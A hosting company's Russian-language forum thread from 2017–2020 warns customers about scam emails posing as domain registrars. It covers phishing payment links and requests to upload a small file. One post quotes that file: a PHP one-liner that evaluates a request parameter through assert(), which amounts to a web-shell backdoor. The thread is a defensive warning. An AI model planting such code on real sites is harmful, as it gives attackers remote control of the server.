RuWeb.net Forum - разработано XMB

Рассылка от имени регистраторов (мошенничество)

kpv - 27.1.2017 в 09:40

Очередное мошенничество с целью заполучить обманным путём доступ к Вашему хостингу.
Злоумышленники рассылают письма от имени регистраторов, официальных органов и так далее,в которых указывают имя Вашего сайта и требование к выполнению каких-то действий (подтверждение права на домен, подтверждение администратора и так далее).
И якобы для этого надо разместить на вашем сайте маленький файл с безобидной на первый взгляд строчкой. НЕ ДЕЛАЙТЕ ЭТОГО
Вы тем самым даёте злоумышленнику полный доступ к Вашему сайту.

[Отредактировано 27.1.2017 кто support]

Anonymous - 27.1.2017 в 12:29

Цитата:

Исходное сообщение добавлено kpv
[size=5][color=Red]маленький файл с безобидной на первый взгляд строчкой

и что это за строчка?

kpv - 27.1.2017 в 13:39

варианты могут быть разные, вот один из примеров

Код:

<?php
assert(stripslashes($_REQUEST[BLABLABLA]));
?>

kpv - 31.8.2017 в 20:46

Внимание, мошенники теперь начали новые рассылки, где запугивают удалением домена и требованием немедленно оплатить продление домена. Письмо может придти от любого регистратора и маскировка идёт очень искусно, смотрите пример письма

kpv - 31.8.2017 в 20:49

Ни в коем случае не переходите по ссылкам в таком письме, так как попадёте якобы на сайт платёжной системы и данные от банковской карты попадут к злоумышленникам и Вы потеряете все свои деньги. Фишинговая страница тоже очень хорошо оформлена, но находится она, обычно, на взломанных сайтах

kpv - 22.8.2018 в 09:21

Мошенники продолжают рассылать письма, вот пример стилизации письма под регистратора REGRU.
Будьте бдительны и не поддавайтесь на провокации. В случае каких-либо сомнений в подлинности письма - обязательно пишите нам свои вопросы.

kpv - 22.8.2018 в 14:06

Наши клиенты присылают нам образцы подобных писем, вот ещё парочка. Обратите внимание - ссылка на оплату ведёт на совершенно посторонний сайт, который перенаправляет на сайт Яндекс Денег, где вам предлагается перевести энную сумму на счета мошенников

kpv - 22.8.2018 в 14:08

это уже после перехода по ссылке в письме предлагается заплатить на кошелёк мошенника

[Отредактировано 22.8.2018 кто kpv]

kpv - 3.10.2018 в 11:39

Ещё одно письмо в коллекцию "Письма от регистраторов"

[Отредактировано 3.10.2018 кто kpv]

kpv - 3.2.2020 в 13:22

Видимо это очень прибыльный "бизнес", сообщения владельцам доменов идут круглогодично и до сих пор. Ссылка на оплату идёт прямо на сайт Яндекс Денег, но это частный кошелёк мошенника, а не регистратора

[Отредактировано 3.2.2020 кто kpv]

kpv - 4.2.2020 в 19:48

все эти письма от мошенников, поэтому внимательно смотрите куда ведёт ссылка для оплаты и с какого адреса пришло письмо. Если возникают какие-то вопросы - не стесняйтесь нас спросить и уточнить